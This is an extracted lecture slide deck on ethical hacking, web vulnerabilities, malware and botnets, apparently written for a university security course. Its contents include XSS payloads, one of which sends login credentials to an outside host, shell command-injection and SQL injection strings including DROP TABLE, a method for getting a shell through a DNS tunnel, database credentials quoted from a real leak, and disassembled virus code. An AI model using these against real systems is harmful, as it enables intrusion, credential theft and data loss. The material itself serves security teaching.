(c) Boldizsár Bencsáth Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek

Méret: px
Mutatás kezdődik a ... oldaltól:

Download "(c) Boldizsár Bencsáth (bencsath@crysys.hu) Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek"

Átírás

1 (c) Boldizsár Bencsáth Rosszindulatú programok, botnetek Webes sérülékenységek Etikus hacking módszerek

2 How a typical hacker compromises a system Teljes integritás Információgyűjtés Információ a rendszerről kijutott Már próbálkoztak Már próbálkoztak (b) Egyik próba sikeres Adminisztrátori jogok és infó kijutás Hiba kiaknázáspróba Információk a rendszer belsejéről További célpontok és infogyűjtés Rendszer veszélyben Hiba kiaknázáspróba Információszerzés a gép belső rendszeréről Many attacks are successful by multiple steps! Hiba által shellhez jutás Támadó bejutott Egész rendszer feltörése Minden feltörve Pseudo-random number generators (PRNG) 2

3 The named version of BME DNS server dig txt ch ; <<>> DiG P3 <<>> txt ch ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; WARNING: recursion requested but not available ;; QUESTION SECTION: ;version.bind. CH TXT ;; ANSWER SECTION: version.bind. 0 CH TXT "9.5.1-P3" ;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind. Pseudo-random number generators (PRNG) 3

4 Version.bind So You can check the version of bind But You cannot be sure it is not faked As sysadmin, You might want to set this to something fake That will be security-through-obscurity But If You are lazy to upgrade whenever it is needed- at least, fake the version info Pseudo-random number generators (PRNG) 4

5 Zone transfer if allowed dig in axfr ; <<>> DiG P3 <<>> in axfr ;; global options: printcmd crysys.hu IN SOA ns1.crysys.dc.hu. netadmin.ns1.crysys.dc.hu crysys.hu IN NS ns1.crysys.dc.hu. crysys.hu IN NS ns2.crysys.dc.hu. crysys.hu IN A crysys.hu IN MX 10 shamir.crysys.hu. crysys.hu IN MX 50 eternal.datacontact.hu. crysys.hu IN TXT "Datacontact - your nameserver..." aggregator.crysys.hu IN A albifrons.crysys.hu IN A clamav.crysys.hu IN A cypio.crysys.hu IN A db.crysys.hu IN A deserecprj.crysys.hu IN A deserecvclt1.crysys.hu IN A deserecvclt2.crysys.hu IN A deserecvhost1.crysys.hu IN A deserecvirtclt1.crysys.hu IN A deserecvirtclt2.crysys.hu IN A Pseudo-random number generators (PRNG) 5

6 Zone transfer authorization dig in axfr ; <<>> DiG P1 <<>> in axfr ;; global options: printcmd ; Transfer failed. Limiting zone transfer in named.conf: allow-transfer { ; ; ) Pseudo-random number generators (PRNG) 6

7 News 2010 valasztas.hu- info leak bad access rights Idézet: PoolSet.add("VALTORT",new Pool(new EKPD","valtort","valtort"),1,1,0,0,0,0,false,false)); van am szekuriti! valasztas.hu/valtort/jsp/vlt_start_jsp_inc.txt+%22jdbc:oracle:t hin:% :1521:ekpd%22,%22valtort%22,%2 2valtort%22%29,&cd=3&hl=hu&ct=clnk&gl=hu&client=firefox -a Pseudo-random number generators (PRNG) 7

8 Google stored version leak after deletion <%! String hstr(int i){return StatData.hstr(i);}%> <%! String dstr(java.sql.date d){return StatData.dstr(d);}%> <%! String ifa(boolean l, String qstr, String[] param, int n) { return StatData.ifA(l, qstr, param, n);}%> <%! String ifa(boolean l, String qstr, String[] param, String link) { return StatData.ifA(l, qstr, param, link);}%> <%! String ifa(string qstr, String[] param, int n) { return StatData.ifA(qstr, param, n);}%> <% PoolSetObj pso = null; Connection c = null; PreparedStatement st[] = new PreparedStatement[0]; try { Class l_c = this.getclass(); java.lang.reflect.field f = l_c.getdeclaredfield("sqln"); int l_n = f.getint(l_c); st = new PreparedStatement[l_n]; }catch (Exception e) {} PreparedStatement pst = null; ResultSet rs = null; String sql = null; try { if (PoolSet.get("VALTORT")==null) PoolSet.add("VALTORT",new Pool(new OraclePoolFactory("jdbc:oracle:thin:@ :1521:EKPD","valt ort","valtort"),1,1,0,0,0,0,false,false)); pso = PoolSet.getSetObj("VALTORT",funcName); c = (Connection)pso.getObj(); StatData.loadData(c); %> <html> <head> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso "> Pseudo-random number generators (PRNG) 8

9 Example Web info leak video here End of part talking about info gathering /leak Security by obscurity -> is it good? Pseudo-random number generators (PRNG) 9

10 VULNS Main web vulns will be covered here XSS Code injection SQL injection Pseudo-random number generators (PRNG) 10

11 Case study: Hacker attack against valasztas.hu 2010 Pseudo-random number generators (PRNG) 11

12 Offending links / XSS zop+maffi%f3z%f3i desz+- +Magyar+Politikusb%FBn%F6z%F5+Sz%F6vets%E9g+ %20egyetlen%20tiszta%20p%E1rt,%20a%20Jobbik The parameter NEV is not used carefully on the server Possibility of Cross-site-scripting Pseudo-random number generators (PRNG) 12

13 What is XSS (cross site scripting)? Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.[1] Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner. Pseudo-random number generators (PRNG) 13

14 XSS Exploit scenarios Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the cast of characters commonly used in computer security. Non-persistent: Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability, and sends Alice an , enticing her to click on a link for the URL under false pretenses. This URL will point to Bob's website, but will contain Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge. Persistent attack: Mallory posts a message with malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.[16] [not too much difference between the two] Pseudo-random number generators (PRNG) 14

15 more xss.php Hello <? echo "$nev";?> (register_globals=on) Pseudo-random number generators (PRNG) 15

16 Xss.php?nev=boldi Pseudo-random number generators (PRNG) 16

17 3Ealert%281111%29;%3C/ScRiPt%3E Pseudo-random number generators (PRNG) 17

18 Pseudo-random number generators (PRNG) 18

19 XSS vulnerability found by Acunetix scanner Pseudo-random number generators (PRNG) 19

20 Ha az egeret a user részre visszük, Pseudo-random number generators (PRNG) 20

21 Nexon XSS: Have a look inside <!-- Üres sor (hogy a bejelentkezés képrészletbe ne írjunk bele) --> <tr> <td height="60" colspan="4"> </td> </tr> <!-- Felhasználói név --> <tr> <td width="310"></td> <td class="subtitle" width="85" align="right">felhasználó: </td> <td width="149"> <input type="text" name="vstrusername" id="vstrusername" style="width: 80%" size="20" value="" onmouseover=prompt(938492) bad=""> </td> <td width="30"> </td> </tr> Pseudo-random number generators (PRNG) 21

22 Neptun XSS found by Acunetix scanner Pseudo-random number generators (PRNG) 22

23 Details. -> <form name="login" method="post" action="include/setcookie.php?res=aa""> m=new%20image;%20im.src=%27http:// un/%27%2bdocument.forms[0].uname.value%2b%27:%27% 2bdocument.forms[0].passwd.value Results in: method="post" action="include/setcookie.php?res=" onsubmit=" im=new Image; im.src=' ame.value+':'+document.forms[0].passwd.value"> Pseudo-random number generators (PRNG) 23

24 Pseudo-random number generators (PRNG) 24

25 Pseudo-random number generators (PRNG) 25

26 Code injection example Consider the following PHP code: <? $o=`ls la $i`; echo("result of the command:$o"); result of the command:-rw-rw-r-- 1 boldi boldi 0 Feb 24 21:40 aa grep%20root result of the command:-rw-rw-r-- 1 boldi boldi 0 Feb 24 21:40 aa root:x:0:0:root:/root:/bin/bash The variable $i is controlled by the client The PHP script will run a shell command containing the $i string The client can get out of the ls command by simple tricks in this case ; will help him to put another command to the shell specified totally by the attacker Pseudo-random number generators (PRNG) 26

27 Php fopen error video shown here Pseudo-random number generators (PRNG) 27

28 SQL injection example Consider the following statement: statement = "SELECT * FROM `users` WHERE `name` = '" + username + "';" Set username to: ' or '1'='1 This results in: SELECT * FROM `users` WHERE `name` = '' OR '1'='1'; (will list all users) Or a more problematic attacking string: a';drop TABLE `users`; SELECT * FROM `userinfo` WHERE 't' = 't Results in: SELECT * FROM `users` WHERE `name` = 'a'; DROP TABLE `users`; SELECT * FROM `userinfo` WHERE 't' = 't'; Some tricks: Pseudo-random number generators (PRNG) 28

29 SQL injection very very very short summary There are sql commands to save/load files and sometimes to start processes It s very important not to let users to do arbitrary SQL commands Sqlmap videos shown here Pseudo-random number generators (PRNG) 29

30 Cross-site scripting example PHP example: <?echo "hello $user";?> hello boldi cript%3e (that means: ) Will result in an alert box. Any javascript code be embedded in this way (specified by the attacker). The code can be specified by the creator of the URL, the bad code is on the attacked server (crysys.hu php code) The script will be executed on the client, with the environment of the server host (e.g. here crysys.hu) thus the script can get e.g. cookie information from the crysys.hu domain. (The javascript interpreter on the client computer will believe that the javascript code is specified by crysys.hu, not the URL creator!) Pseudo-random number generators (PRNG) 30

31 PHP in DNS: Ethical hacker conf material Van egy sérülékeny weboldalunk Tudunk parancsokat futtatni, de szeretnénk shellt A parancsfuttatás méretkorlátos: csak ~26 karakter hosszú max. Webes alkönyvtárakat nem tudjuk írni A sérülékeny gépről kifele semmilyen port nem nyitható A sérülékeny gép kívülről csak a 80-as porton érhető el A DNS viszont jól láthatóan működik Pseudo-random number generators (PRNG) 31

32 A sérülékeny script bizonyítványnézegető (ez fonto $ more read.php Reading cert file <? $certname=$_request["certname"]; $certname=substr($certname,0,26); sleep(2); #Against brute force User controlled string Shell command like exec, system, etc. $res=`cat certs/$certname`; if (preg_match("/ok/",$res)) { echo("cert loaded successfully: ".$res."\n<br>");} else { echo("bad certname (debug:<pre> file:$certname res:$res </pre>) "); } Pseudo-random number generators (PRNG) 32

33 Nagyon meg van kötve a kezünk Nem rakhatunk fel reverse php shellt, mert nem tudunk írni a web könyvtárakba Reverse shell nem tud kapcsolatot nyitni kifele Még egy wget, tftp sem fut le, nem lehet feltölteni fájlokat Nincs root jogunk sem, nem lőhetjük le a web szervert Mit tegyünk? Pseudo-random number generators (PRNG) 33

34 Több problémát kell megoldani Milyen átviteli közeget tudunk használni a kommunikációra egy shellel? Milyen módon juttassuk el a shellt biztosító kódunkat és mi legyen az? Pseudo-random number generators (PRNG) 34

35 DNS Tunnel A shell átviteli közege nem lehet webes, hisz nem csinálhatunk új tartalmat Minden más port zárva Csak a DNS jön szóba átviteli közegnek A válasz adott: DNS Tunnel IP csomag DNS kérés IP csomag Helyi DNS DNS server Feltöltött DNS tunnel alkalmazás IP csomag DNS tunnel végpont Támadó üzemelteti Pseudo-random number generators (PRNG) 35

36 Mivel? Sok lehetőség van, de akadnak gondok is Iodined: tun if root jog kell mindkét oldalon Heyoka OzymanDNS Squeeza NSTX: tun virtuális interfész: root jog kell Dns2tcp Pseudo-random number generators (PRNG) 36

37 DNS2TCP tar.gz A DNS2TCP-t válaszottuk C implementáció, kis méret, portabilitás (könnyű felrakni) Nincs szükség root jogra a kliensen Csak fel kell töltenünk a kb. 30 kilobyte méretű programot és elindítani -rwxr-xr-x 1 root root -rwxr-xr-x 1 root root Apr 18 08:06 dns2tcpc Apr 18 08:06 dns2tcpd Pseudo-random number generators (PRNG) 37

38 Hogy töltsük föl a DNS tunnel alkalmazást? Töltsük fel byte-onként! Így elfér 24 karakterben egy-egy parancs Pl.: login=;printf \\001 >>/tmp/a Ezesetben egy-egy tetszőleges bináris byte-ot tudunk fájlba irányítani Nagyon sok kérés kell egy fájlfeltöltéshez A script pár másodperces késleltetést is tartalmaz, így napokig töltögethetnénk Ez így nem fog menni Pseudo-random number generators (PRNG) 38

39 Használjuk a DNS-t! Már a kód feltöltéshez is a DNS-t kell használnunk Helyezzünk PHP kódot DNS adatokba és bízzuk a PHP értelmezőre! Önkicsomagoló PHP kód: kód és adat egyhelyen Egy parancs kell csak szinte a feltöltéshez dig prj.hu in txt php (kipróbálható!) Természetesen van más megoldás is, pl. adat DNS-ben, kicsomagoló kód külön Pseudo-random number generators (PRNG) 39

40 Hogy működik Minta lekérdezés: dig prj.hu in txt ; <<>> DiG <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN TXT ;; ANSWER SECTION: prj.hu. 20 IN TXT "v=spf1 a mx -all" Pseudo-random number generators (PRNG) 40

41 Rakjunk bele php kódot ; <<>> DiG <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN TXT ;; ANSWER SECTION: prj.hu. 20 IN TXT " <?php echo 'hello world '.(3+3)?>" prj.hu. 20 IN TXT "v=spf1 a mx -all" Nézzük az eredményét! Pseudo-random number generators (PRNG) 41

42 Eredmény rendben fut ; <<>> DiG <<>> prj.hu in txt ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3 ;; QUESTION SECTION: ;prj.hu. IN TXT ;; ANSWER SECTION: prj.hu. 20 IN TXT "v=spf1 a mx -all" prj.hu. 20 IN TXT " hello world 6" Pseudo-random number generators (PRNG) 42

43 Gondok ; és idézőjel nem használható \; kerülne a helyére Szerencsére a tag lezárás egyenértékű egy ;-vel Természetesen lehetne utófeldolgozni is (\ kivétele sed-del) Pl. <?php echo a?><?php echo b?> Idézőjel ( ) sem használható, de aposztróf ( ) igen Hibás: prj.hu. 1 IN TXT " <?php echo " "hello" "world" ".2+2\;?> Egy jó 5 TXT " <?php echo 'hello world '.(3+3)?>" Pseudo-random number generators (PRNG) 43

44 Továbbá Egy TXT string csak 255 byte lehet Több TXT string is lehet egy bejegyzéshez A teljes rekord nem lehet 64k felett, udp query 4k felett Egyes tűzfalak limitálhatják a méretet Más speciális karakterek sem működnek. Vagy nehézkes megoldani Külön gond: A rekordok round robin kerülnek megjelentetésre (random sorrend) Pseudo-random number generators (PRNG) 44

45 Round robin válasz random sorrend Tervezett kód: prj.hu. 20 IN TXT " <?php $a=1?>" prj.hu. 20 IN TXT " <?php $a=$a+1?>" prj.hu. 20 IN TXT " <?php echo $a?> Letöltéskor kapott adat: ;; ANSWER SECTION: prj.hu. 20 IN TXT " <?php $a=$a+1?>" prj.hu. 20 IN TXT " <?php echo $a?>" prj.hu. 20 IN TXT " <?php $a=1?>" Nyilvánvalóan a két kód nem vezet azonos eredményre. Pseudo-random number generators (PRNG) 45

46 Megoldás a sorrendproblémára goto csak PHP fölött p3 5 TXT " <?php a15:?><?php if ($t!=1) {?><?php goto a0?><?php }?><?php goto a16 p3 5 TXT " <?php a52:?><?php if ($t!=1) {?><?php goto a0?><?php }?><?php goto a53 p3 5 TXT " <?php a0:?><?php \$t=1?> <?php goto a1?> A lefutás végén die(); Pseudo-random number generators (PRNG) 46

47 Megoldások A különleges karaktereket tartalmazó kódot base64 kódolhatjuk, kicsomagolás után eval segítségével futtathatjuk Nagyobb stringeket szétvághatunk és darabokban kódoljuk egy-egy TXT rekordra, majd konkatenálunk TTL-t alacsonyan tartjuk, hogy frissíthessünk ha rossz a kód Pseudo-random number generators (PRNG) 47

48 Kezdjük összerakni Dns2tcp DNS tunnel lefordítva Packer.php: Becsomagoljuk a DNS tunnel klienst és hosszabb parancsainkat DNS rekordokba (előkészítés) DNS kiszolgáló: Az eredményt be kell tölteni a DNS-be Futtatás: Egyetlen paranccsal aktiváljuk az eredményt a sérülékeny gépen Elvárt eredmény: shell hozzáférés Pseudo-random number generators (PRNG) 48

49 1. Use tools 2. Use your mind Pseudo-random number generators (PRNG) 49

50 1. Use tools Use tools as they are more up to date, than you Example: Qualys Browsercheck is a great tool to test your browser s plugins Pseudo-random number generators (PRNG) 50

51 Pseudo-random number generators (PRNG) 51

52 Pseudo-random number generators (PRNG) 52

53 Network vulnerability scanners Target: A system, IP range, etc. Goal: To find vulnerable software components of the target in a fast and efficient way: Test against ten thousands of vulnerabilities in seconds Working method: Scans target for services identifies software version Performs basic tests to find out vulnerable services (e.g. is anonymous ftp login enabled?) Generally uses a number of active plugins to test target service against known vulnerabilities Uses a database that contains vulnerable software version numbers -> only matching this to the identified software version might result in large number of false positives Generally a lot more is incorporated (login support, password trial for weak pw., fuzzing tests, etc.) Pseudo-random number generators (PRNG) 53

54 Problems and advantages of vulnerability scanners Problems Limited availability of free tools (Nessus: free, open source to closed source, limited free version) Vulnerability databases have to be kept updated Knowledge might be needed on the OS, Services to have accurate results (to avoid false positives) Attacks against custom settings, tools, software components is generally missing Generally, no new attack or system-wide vulnerability can be found The human knowledge is still needed Advantages Automatic running, fast scanning of multiple hosts against thousands of vulnerabilities Good looking automatic reports as audit material Most of the internet-wide scanning attacks can be prevented (those attackers also use standard attacks, databases) Pseudo-random number generators (PRNG) 54

55 Web vulnerability scanner Acunetix Web Vulnerability scanner is a great tool to find web attacks Even unknown ones (SQL injection, cross site scripting) The trial version only checks for XSS attacks 1. Acunetix XSS scanner VIDEO acunetix-webscan-1-v1.avi 04:20 Homework: Install and test -Nessus -Eagle Eye Retina Community Ed. -Nmap 2. NESSUS Pseudo-random number generators (PRNG) 55

56 M MALWARE Pseudo-random number generators (PRNG) 56

57 Malware malicious and software software designed to infiltrate or damage a computer system without the owner's informed consent Computer virus Worm Trojan horse Rootkit, backdoor Spyware Keylogger Adware Zombie,bot Fake antivirus product etc. Pseudo-random number generators (PRNG) 57

58 Computer Virus why the name? A virus is: Not a full program, cannot live alone It reproduces itself, spreads. ( Infection ) Some transfer media, user interaction might be needed Makes nasty things (or not) Most so-called viruses is not a virus by this definition. Worm: Can reproduce automatically (no user needed) Trojan Horse: The user thinks that the code is o.k., but it isn t. Rootkit, backdoor: remains on the computer and hard to find Bot: participates in a distributed network for malicious activity. Pseudo-random number generators (PRNG) 58

59 Virus classification boot sector file infector macro virus encrypted virus stealth virus polymorphic virus (modifications to avoid identification: encryption, inserting dummy code) metamorphic virus (the same, but not inserting dummy code, instead, a-code-that-does-the-same) Pseudo-random number generators (PRNG) 59

60 Old-school file virus Modifies executable files, appends own code into them (how? -.com:simple.exe:a bit more difficult) Whenever the executable is loaded, the virus is started Might instantly check for one/more/all other executables (only.com/only.exe/all) and infect them Or just load into the memory, stay resident (TSR), and infect whenever we execute any program Might modify or encrypt itself at every infection some decryption part is still the same (opportunity to recognize the virus) 20 byte is enough for a basic encryption scheme Tricky modifications can be done by the virus (e.g. xor ax,ax ; mov ax,0 ; sub ax,ax are the same) Pseudo-random number generators (PRNG) 60

61 Other viruses ( virii ) Boot virus: infects boot sector (if you leave a floppy in the drive, it loads the code, and then, ) (now: USB autorun malware) Macro virus: Word/Excel macros affected Hardware level destroying virus: E.g. CIH bios clearing, or cd-rom firmware bugs BIOS virus: Part of the code is stored in the BIOS disinfection might be hard (one of the latest tricks, difficult) Encrypting (ransom) malware: Encrypts all the files, decryption only when you pay. Pseudo-random number generators (PRNG) 61

62 Goals of the virus-writers Old times: just to show it is possible to write such code proof of concept (first virus ~1982) Be famous (or to collect- vxers ) For fun Do harmful activities To write a better virus: harder to identify, harder to disinfect, faster spreading, Earn money ( spam, fake virus scanners, phishing, passoword and credit card no. collection, ransom (by encryption), fake-rogue security software, etc. Pseudo-random number generators (PRNG) 62

63 Potyogós virus - cascade Back from 1987 the starting time of the new era for viruses 1071 byte First virus that caused mass infection in Hungary Encrypts itself in some form (no, not AES, nor RSA) Nasty code: after some time, characters started to fall off the screen TSR code Also check: Pseudo-random number generators (PRNG) 63

64 Potyogós in action Pseudo-random number generators (PRNG) 64

65 Binary version of polimer virus only ~1000 bytes Pseudo-random number generators (PRNG) 65

66 Part of disassembled virus polimer polimer proc far start:: jmp loc_4 db 00h, 3Fh db 7 dup (3Fh) db 43h, 4Fh, 4Dh, 00h, 02h, 00h db 40h, 00h, 8Dh, 36h, 80h, 00h db 03h, 00h db 14 dup (0) data_59 db 'A legjobb kazetta a POLIMER kaze' db 'tta! Vegye ezt! ', 0Ah, 0Dh db '$' db 'ERROR', 0Ah, 0Dh, '$' data_60 dw 5 data_61 dw 147Dh loc_1:: mov si,data_46e mov di,data_49e mov cx,30h cld ; Clear direction rep movsb ; Rep when cx >0 Mov [si] to es:[di] jmp $-0BAh loc_2:: jmp loc_10 loc_3:: jmp loc_9 loc_4:: mov al,0 mov ah,0eh int 21h ; DOS Services ah=function 0Eh ; set default drive dl (0=a:) mov dx,data_36e mov ah,1ah int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx Pseudo-random number generators (PRNG) 66

67 Sample polymorphic code the basis Start: GOTO Decryption_Code Encrypted:... lots of encrypted code... Decryption_Code: A = Encrypted Loop: B = *A B = B XOR CryptoKey *A = B A = A + 1 GOTO Loop IF NOT A = Decryption_Code GOTO Encrypted CryptoKey: some_random_number From wikipedia Pseudo-random number generators (PRNG) 67

68 The polymorphic equivalent Start: GOTO Decryption_Code Encrypted:... lots of encrypted code... Decryption_Code: C = C + 1 A = Encrypted Loop: B = *A C = 3214 * A B = B XOR CryptoKey *A = B C = 1 C = A + B A = A + 1 GOTO Loop IF NOT A = Decryption_Code C = C^2 GOTO Encrypted CryptoKey: some_random_number Pseudo-random number generators (PRNG) 68

69 Macro virus became very common in mid-1990s since platform independent infect documents easily spread exploit macro capability of office apps executable program embedded in office doc often a form of Basic more recent releases include protection recognized by many anti-virus programs Pseudo-random number generators (PRNG) 69

70 Rogue security software -wiki I guess You expected a shorter list, The number of Rogue security software rose at an insane rate in the last few years Pseudo-random number generators (PRNG) 70

71 Limits of the malware A malware can fully control a computer Read memory, files Record keyboard, mouse, monitor activity Use webcam, microphone of the computer Find all archived information ( s, stored passwords, , web history, stored files, etc.) A malware can hide itself very efficiently, currently it is almost always identifiable, but later? Security schemes with additional hardware needed (smart card, token, OTP generator with/without challenge) remember: the computer is still controlled by the attacker No easy solution on untrusted terminal problem Therefore it is essential to avoid malware infections Of course, in practice, malware is not perfect, but: expect the worst case. Pseudo-random number generators (PRNG) 71

72 Worms replicating program that propagates over net using , remote exec, remote login has phases like a virus: dormant, propagation, triggering, execution propagation phase: searches for other systems, connects to it, copies self to it and runs may disguise itself as a system process concept seen in Brunner s Shockwave Rider implemented by Xerox Palo Alto labs in 1980 s Pseudo-random number generators (PRNG) 72

73 Worm propagation model Pseudo-random number generators (PRNG) 73

74 Famous Worm Attacks Code Red July 2001 exploiting MS IIS bug probes random IP address, does DDoS attack consumes significant net capacity when active Code Red II variant includes backdoor SQL Slammer early 2003, attacks MS SQL Server compact and very rapid spread Mydoom mass-mailing worm that appeared in 2004 installed remote access backdoor in infected systems Nowtimes: One after the other, hard to keep-up with new worms/botnets Pseudo-random number generators (PRNG) 74

75 Identification of malware Based on signatures (hard to make for polymorphic or metamorphic code) In files (virus) In network traffic (worms, viruses) In memory (infected hosts, e.g. botnet) Highly optimized (thousands of signatures should be detected) Based on behavior (anomaly detection, checking code (e.g. for unpacking), heuristic algorithms scoring) Pseudo-random number generators (PRNG) 75

76 Removal of malware First step: terminate running malware (not possible at every time ) The malware might stop the removal tool The malware might detect our plans and do bad things (e.g. delete files) Some malware run in multiple tasks to avoid stopping Some malware are specially designed to download more malware all should be removed The files of the malware should be identified Based on signatures Check auto-start applications Can be deep in the OS (modified kernel, modified BIOS) For traditional viruses: the code is injected into a binary executable Remove the malware Generally a simple file deletion is enough In traditional virus, the code should be extracted from the host software: hard task, virus killers exist, but not for all virus Backdoors, or re-infection trick made by the malware should also be cleared (not very common) The vulnerability should also be handled to avoid re-infection Some junk might remain including text files with collected passwords!) Most malware has a mechanism to avoid multiple infections might be a trick to protect hosts (e.g. modify exe header / might corrupt some files and others remain unaffected) Pseudo-random number generators (PRNG) 76

77 Future of malware Stuxnet is a great example for targeted attacks, where the goal of the adversary is to attack a very specific target In this case, the target was some industrial facilities (related to nuclear power) in Iran Advanced persistent threat (APT) usually refers to a group, such as a foreign nation state government, with both the capability and the intent to persistently and effectively target a specific entity. Virtualization, malware analysis, collaborative countermeasures, mobile phones, embedded systems: Lot of open questions in the field of malware Pseudo-random number generators (PRNG) 77

78 Botnet RoBOT NETwork Gépek megfertőzése Fertőzött gépekből hálózat kialakítása Vezérlésre várakozás Támadás, vezérlésre (DDoS, spam, etc.) Frissítés További fertőzések stb. Legnagyobb botnetek mérete milliós nagyságrendű Pseudo-random number generators (PRNG) 78

79 Botnet history Pseudo-random number generators (PRNG) 79

80 DDoS Botnet with IRC Attacker Internet IRC server 1 IRC server n Attacking computers, zombies Target Pseudo-random number generators (PRNG) 80

81 IRC-Internet Relay Chat censored Pseudo-random number generators (PRNG) 81

82 IRC botnets IRC botnets: A controller can send messages to a channel The messages are received by the bots on the same channel (the servers relay the messages) The channel might be protected e.g. with password (of course, this can be recovered from active bots or by sniffing network activity: IRC is a cleartext protocol) The messages contain the commands of the controller/owner Bots can test the authenticity of the messages in some fashion Pseudo-random number generators (PRNG) 82

83 centralized vs. P2P botnet IRC-based and other centralized botnets have drawbacks A new trend for botnets is using P2P technologies DHT (distributed hash tables) based techniques are common However, e.g. delay might be higher for P2P botnets Planning Botnet detection Delay Survivability Identification of the controller/ owner centralized easy (1) easy (1) small (3) bad (1) easy (1) P2P hard (3) hard (3) medium (2) good (3) hard (3) Pseudo-random number generators (PRNG) 83

84 How to determine the size of the botnet? The size of the botnet is an important parameter. A large botnet can be more dangerous Counting individual IP addresses can give false results (e.g. bots behind NAT) The size of the botnet constantly changes counting can also take time -> error IRC based botnets: activity of the bots might be visible, easy to count P2P botnets: e.g. doing queries in the DHT; sometimes the botnet uses IDs to identify individual bots last ID might be queried Pseudo-random number generators (PRNG) 84

85 What to do against botnets Identification, size estimation Upgrade, patch against vulnerabilities (sometimes the patch gives hints to the attackers) Patch the vulnerable hosts remotely: illegal Find the owner of the botnet (hard task) Get control over the botnet (better botnets, harder to do) Support removal (by tools, knowledge): slow Eliminate upgrade possibilities (e.g domains, web pages) or control mechanism (disable communication, injecting code): harder and harder Pseudo-random number generators (PRNG) 85

86 Conficker botnet MS vulnerability is used A,B and C variants exist (as of 05/2009) Conficker is a DLL Using the vulnerability it inserts itself into the system as a system service Also uses USB drives to infect DLL + rundll32.exe (turn off auto-run for USB drives!) Update: Time-seeded random domain names are used to download encrypted binaries by HTTP. Source: Analysis of honeynet.org Pseudo-random number generators (PRNG) 86

87 Vulnerability used by Conficker Vulnerability: NetpwPathCanonicalize() in netapi32.dll. On an established SMB channel (port 445), a path string is canonicalized. E.g. aaa\bbb\..\ccc -> aaa\bbb With a specially crafted path string it is possible to move beyond the start of a stack buffer and overwrite return address (not a classical buffer overflow, but similar) PEB shellcode is used, 00 bytes are avoided with an xor encryption routine Pseudo-random number generators (PRNG) 87

88 Conficker hooks some system calls E.g. DNS: to filter out for antivirus websites Pseudo-random number generators (PRNG) 88

89 NetpwCanonicalize hook First of all: no other botnets should be able to infect this computer Conficker: if \..\ is found, then the shellcode is checked. Can decide if the exploit is coming from another conficker instance If a special string is found in the data, conficker tries to use this to update itself. The behavior of the function is slightly modified ->ability to detect the bot Update checking: if RSA signature does not exist -> no update (SHA-1, 1024 bit RSA -> latest Conficker 4096 bit RSA + unknown hash) SHA-1 is from OpenSSL library Pseudo-random number generators (PRNG) 89

90 Upgrade mechanism Domain flux: For the update, conficker A/B generates random domain names, daily. Antivirus companies tried to preregister them Conficker.C uses domain names, daily The PRNG is seeded by the current time Time synchronization: downloads web pages (google, yahoo, ) and uses the time data (day, month, year) in the HTTP response Pseudo-random number generators (PRNG) 90

91 Conficker domain generation algorithm Pseudo-random number generators (PRNG) 91

92 Conficker upgrade The generated domain name is checked for updates Updates are protected with RSA signatures public key is in the bot itself 1024 bit long in Conficker.A, 4096 bits for the other variants The public key is a good signature to search for (bot identification) Pseudo-random number generators (PRNG) 92

93 Conficker blacklists Conficker uses blacklist of network addresses (IP numbers) to avoid identification And to avoid scanning low-yield networks (expecting that most of the computers are patched here) E.g. IP addresses of the following companies are included: Kaspersky Trend Micro Symantec McAfee F-Secure Avira Bitdefender Microsoft Corp. Microsoft Education Microsoft License Microsoft Visual Studios Pseudo-random number generators (PRNG) 93

94 Removal of Conficker Conficker detects removal tools and tries to avoid removal Conficker code is packed (polymorphic) on the network or in the file system However, on the target computer the code is unpacked while running Easier to detect running processes The code is stored under random file names not fully random (depends on the variant) Special flags and security settings on the file are used Every instance should be removed to avoid re-infection A trick: Conficker uses OS mutexes to avoid running multiple instances. The mutex generation is based on CRC. Might be used to avoid reinfections. Pseudo-random number generators (PRNG) 94

95 Hidden Conficker file Pseudo-random number generators (PRNG) 95

96 How to identify bots in Conficker DNS sinkhole antivirus countermeasure Update DNS names used by conficker (getting queries from infected computers): although cannot inject any code into the botnet as RSA signature might fail, the querying computer can be identified. Scanning on infected computers (removal tools) problematic Using the P2P approach of conficker Pseudo-random number generators (PRNG) 96

97 Conficker.C Pseudo-random number generators (PRNG) 97

Adatbiztonság a gazaságinformatikában

